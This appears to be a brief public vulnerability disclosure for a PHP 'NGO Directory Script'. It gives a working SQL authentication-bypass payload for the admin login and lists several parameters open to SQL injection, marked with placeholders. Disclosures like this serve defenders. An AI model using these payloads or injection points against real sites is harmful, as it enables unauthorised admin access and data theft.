# # # # # # Vulnerability: SQL Injection + Authentication Bypass # Date: 18.01.2017 # Vendor Homepage: http://www.scriptgiant.com/ # Script Name: NGO Directory Script # Script Buy Now: http://www.popularclones.com/products/NGO-Directory-Script # Author: Ihsan Sencan # Author Web: http://ihsan.net # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # Authentication Bypass : # http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter. # SQL Injection/Exploit : # http://localhost/[PATH]/admin/add_country.php?countryid=[SQL] # http://localhost/[PATH]/admin/states_add.php?state_id=[SQL] # http://localhost/[PATH]/admin/cities_add.php?cityid=[SQL] # http://localhost/[PATH]/admin/request_add.php?request_id=[SQL] # http://localhost/[PATH]/admin/good_category_add.php?goods_cat_id=[SQL] # http://localhost/[PATH]/details_religios.html?project_id=[SQL] # http://localhost/[PATH]/details.html?project_id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. # # # # #